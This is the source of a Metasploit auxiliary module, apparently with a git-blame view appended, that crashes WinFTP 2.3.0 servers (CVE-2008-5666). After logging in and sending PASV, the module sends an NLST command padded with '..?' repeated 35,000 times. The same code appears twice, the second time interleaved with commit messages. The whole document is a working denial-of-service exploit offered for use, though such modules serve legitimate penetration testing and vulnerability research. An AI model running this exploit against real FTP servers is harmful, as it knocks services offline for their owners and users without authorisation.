metasploit-framework/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WinFTP 2.3.0 NLST Denial of Service',
      'Description'    => %q{
        This module is a very rough port of Julien Bedard's
        PoC.  You need a valid login, but even anonymous can
        do it if it has permission to call NLST.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-5666' ],
          [ 'OSVDB', '49043' ],
          [ 'EDB', '6581' ]
        ],
      'DisclosureDate' => 'Sep 26 2008'))
  end

  def run
    return unless connect_login

    # NLST has to follow a PORT or PASV
    resp = send_cmd(['PASV'])

    raw_send("NLST #{'..?' * 35000}\r\n")

    disconnect
  end
end
Added aux filezilla_server_port.rb. Moved dos aux to OS-based folder. git-svn-id: file:///home/svn/framework3/trunk@6095 4d416f70-5f16-0410-b530-b9f4589650da 2009-01-09 05:33:26 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Added aux filezilla_server_port.rb. Moved dos aux to OS-based folder. git-svn-id: file:///home/svn/framework3/trunk@6095 4d416f70-5f16-0410-b530-b9f4589650da 2009-01-09 05:33:26 +00:00			`##`

add aux module from Kris Katterjohn. git-svn-id: file:///home/svn/framework3/trunk@5703 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 23:28:24 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Auxiliary`
add aux module from Kris Katterjohn. git-svn-id: file:///home/svn/framework3/trunk@5703 4d416f70-5f16-0410-b530-b9f4589650da 2008-09-30 23:28:24 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Ftp`
			`include Msf::Auxiliary::Dos`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'WinFTP 2.3.0 NLST Denial of Service',`
			`'Description' => %q{`
			`This module is a very rough port of Julien Bedard's`
			`PoC. You need a valid login, but even anonymous can`
			`do it if it has permission to call NLST.`
			`},`
			`'Author' => 'kris katterjohn',`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2008-5666' ],`
			`[ 'OSVDB', '49043' ],`
			`[ 'EDB', '6581' ]`
			`],`
			`'DisclosureDate' => 'Sep 26 2008'))`
			`end`

			`def run`
			`return unless connect_login`

			`# NLST has to follow a PORT or PASV`
			`resp = send_cmd(['PASV'])`

			`raw_send("NLST #{'..?' * 35000}\r\n")`

			`disconnect`
			`end`
Update some of my aux modules that require a successful login to not continue running without it git-svn-id: file:///home/svn/framework3/trunk@5802 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-30 00:52:38 +00:00			`end`